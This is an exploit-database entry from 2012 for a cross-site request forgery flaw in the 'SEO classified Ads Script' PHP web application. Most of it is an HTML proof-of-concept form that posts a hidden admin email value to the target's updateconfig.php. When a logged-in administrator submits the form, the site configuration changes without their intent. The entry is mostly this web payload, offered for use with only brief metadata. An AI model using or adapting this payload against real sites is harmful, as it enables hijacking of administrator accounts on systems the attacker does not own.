SEO classified Ads Script CSRF Vulnerability

2012-03-13T00:00:00
ID 1337DAY-ID-17697
Type zdt
Reporter Jonturk75
Modified 2012-03-13T00:00:00

Description

Exploit for php platform in category web applications

                                        
                                            # Exploit Title: SEO classified Ads Script CSRF 
# Author: Jonturk75
# Category::  webapps
# Demo : http://demos1.softbiz.com/scripts/seoclassifieds/admin/
# Greetz: Inj3ct0r Exploit DataBase 1337day.com


<form action="target.com/[PATH]/updateconfig.php" method="post" name="frm1" id="frm1"  onSubmit="return Validator(this);" >
<input type="hidden" size="35" value="[email protected]" id="adminemail" name="adminemail"/> 
<input type="submit" value="Update Site Configuration" class="submit" name="Submit"/>



#  0day.today [2018-04-03]  #